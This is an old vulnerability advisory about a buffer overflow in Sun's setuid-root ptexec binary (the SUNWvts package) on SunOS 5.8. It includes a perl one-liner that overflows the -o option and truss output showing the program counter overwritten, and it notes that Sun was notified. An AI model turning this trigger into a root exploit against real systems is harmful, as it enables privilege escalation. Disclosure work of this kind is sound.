Vulnerability

    /opt/SUNWvts/bin/ptexec

Affected

    SunOS 5.8 (not tested on other version)

Description

    Pablo Sor  found following.   A problem  with the  ptexec  command
    included  in  the  SUNWvts  package  (not  included in the Solaris
    default instalation) installed setuid root by default, results  in
    a  buffer  overflow  and  potentially  the  execution of arbitraty
    code.  Due to the insufficient handling of input by the -o  option
    of ptexec, a buffer overflow  at 400 characters makes it  possible
    to overwrite memory space of the running process.

        # uname -a
        SunOS laika 5.8 Generic_108528-07 sun4u sparc SUNW,Ultra-5_10
        
        # > .sunvts_sec_gss
        # /opt/SUNWvts/bin/ptexec -o `perl -e 'print "A"x400'`
        Segmentation Fault (core dumped)
        
        # truss /opt/SUNWvts/bin/ptexec -o `perl -e 'print "A"x400'`
        
        execve("/opt/SUNWvts/bin/ptexec", 0xFFBEFA44, 0xFFBEFA54)  argc = 3
        stat("/opt/SUNWvts/bin/ptexec", 0xFFBEF780)     = 0
        open("/var/ld/ld.config", O_RDONLY)             Err#2 ENOENT
        open("/usr/lib/librpcsvc.so.1", O_RDONLY)       = 3
        fstat(3, 0xFFBEF518)                            = 0
        mmap(0x00000000, 8192, PROT_READ|PROT_EXEC, MAP_PRIVATE, 3, 0) = 0xFF3A0000
        
        [.....]
        
        sigprocmask(SIG_SETMASK, 0xFF23F010, 0x00000000) = 0
        sigaction(SIGSEGV, 0xFFBEE388, 0x00000000)      = 0
        sigprocmask(SIG_SETMASK, 0xFF24ADE0, 0x00000000) = 0
        setcontext(0xFFBEE248)
            Incurred fault #6, FLTBOUNDS  %pc = 0xFF139FF0
              siginfo: SIGSEGV SEGV_MAPERR addr=0x41414141
            Received signal #11, SIGSEGV [default]
              siginfo: SIGSEGV SEGV_MAPERR addr=0x41414141
                *** process killed ***

Solution

    Sun  Microsystems  was  notified  on  June  12, 2001.  Patches are
    excepted shortly.